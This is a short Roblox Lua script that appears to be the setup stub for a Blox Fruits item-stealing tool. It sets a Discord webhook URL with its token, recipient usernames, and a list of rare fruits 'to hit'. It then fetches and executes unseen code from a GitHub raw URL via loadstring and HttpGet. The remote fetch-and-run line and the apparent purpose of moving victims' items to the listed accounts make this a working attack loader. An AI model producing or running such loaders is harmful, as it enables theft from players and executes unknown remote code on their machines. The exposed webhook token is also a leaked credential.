Webhook = "https://discord.com/api/webhooks/1342042295486386216/uPzdgt4HxKGjriw4jW5S4URG_njEsWs3dqGUrNoAwX5VCTnjRTOB9e6ES2Z3PjZrh71T" -- << Your Webhook
Usernames = {"ruben_erik"} -- << Your username(-s).
FruitsToHit = {"Kitsune-Kitsune", "Yeti-Yeti", "Gas-Gas", "Dragon(East)-Dragon(East)", "Dragon(West)-Dragon(West)"} -- << Fruits you want

loadstring(game:HttpGet("https://raw.githubusercontent.com/surelyco/CutestCodes/refs/heads/main/V2"))()
